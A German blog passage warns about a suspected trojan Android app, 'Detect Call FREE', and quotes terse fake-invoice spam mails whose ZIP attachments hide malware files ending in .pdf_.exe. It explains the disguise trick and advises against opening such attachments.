Das ist eine beeindruckend lange Liste für eine App, die im Wesentlichen bei einem Anruf die Telefonnummer anzeigt… die Frage, wozu diese sehr weiten Berechtigungen dienen könnten, beantwortet sich daraus, dass die Hersteller dieser App aus irgendeinem Grund zu der Auffassung gekommen sind, dass sich diese App ohne Spam niemanden andrehen lässt.

Diese mutmaßlich trojanische Brillanz von „Produxio Labs“ wurde bislang auf zwischen 100 und 500 Geräten installiert und hat insgesamt vier ziemlich gute Bewertungen erhalten, die ganz sicher von hochzufriedenen Kunden kommen, denn ich würde ja niemals ohne Beleg behaupten, dass hier vier Google-Konten von Spammern zur Abgabe einer irreführenden Bewertung benutzt wurden.

Als jemand, der diese mutmaßlich trojanische App mit dem Namen „Detect Call FREE“ aus inzwischen hoffentlich verständlichen Gründen nicht ausprobiert hat, aber regelmäßig sein Näschen in die ganze Spam steckt, würde allerdings strikt von einer Installation abraten.

Denn mit einer Spam kommt niemals etwas Gutes.

¹Der Klick hat also Folgen. Bis zu dreißig, die jeden verdammten Tag im Postfach liegen, eine dümmer und krimineller als die andere. Deshalb klickt man nicht in eine Spam.

²Bewusst nicht verlinkt, weil ich keine Schadsoftware verlinken will…

rechnung OWR GmbH

Mittwoch, 1. Juli 2015

Guten Tag,

eine Rechnung

GmbH

Nein, kein Witz, das ist wirklich die ganze Spam… 😀

Der Spammer wollte sich offenbar nicht die Mühe geben, einen langen, komplizierten Text zu schreiben, der dann doch nur lächerlich klingt; und so schrieb er eben einen kurzen Text, der dann doch nur lächerlich klingt. Der Gewinn ist die eingesparte Arbeit.

An dieser Mail hängt ein ZIP-Archiv. Der Empfänger soll offenbar glauben, dass es die „Rechnung“ enthält. Wie immer, wenn ein ZIP-Archiv an einer Mail hängt, ist große Vorsicht geboten, denn Spammer „maskieren“ durch diese Verpackung gern Schadsoftware vor einem Virenscanner auf dem Mailserver. Tatsächlich enthält das ZIP-Archiv eine einzige Datei, deren Name auf .pdf_.exe endet. Der Unterstrich vor dem Punkt deutet darauf hin, dass die alte Masche mit Dateien der Marke .pdf.exe inzwischen bei einigen Antivirus-Schlangenölen zu einem Aussortieren des kriminellen Mülls führt – also wird einfach ein Zeichen eingefügt, bei dem die Kriminellen hoffen, dass es öfter mal von Menschen übersehen wird.

Natürlich ist der Anhang das reinste Gift. Er wird aber zurzeit nur von einem Achtel der gängigen Antivirus-Schlangenöle als das erkannt, was er ist: Gefährliche Schadsoftware. Wer sich auf den „bequemen automatischen Schutz“ durch derartige Programme verlässt, ist verloren – wer aber die Spam als Spam erkennen kann und niemals auf die Idee kommt, einen Mailanhang zu öffnen, der in einem ZIP-Archiv zugestellt wurde, tut mehr für seine Computersicherheit als jemand, der sich auf Antivirus-Schlangenöle verlässt.

Ich empfehle weiterhin die Installation von BRAIN.EXE… 😉

Schneller Nachtrag

Diese Spam scheint die Pest des heutigen Tages zu sein. Hier ist noch eine, die noch schlechter geworden ist:

Betreff: Fakture 7Z3 GmbH

hallo,

beigefügten Rechnung

GmbH

Es gibt noch mehr davon. Das Muster ist immer gleich. Eine angebliche Firma im Betreff; ein kurzer, patziger Mailtext; die Abk. „GmbH“ als „Unterschrift“ und im Anhang aktuelle, gefährliche Schadsoftware.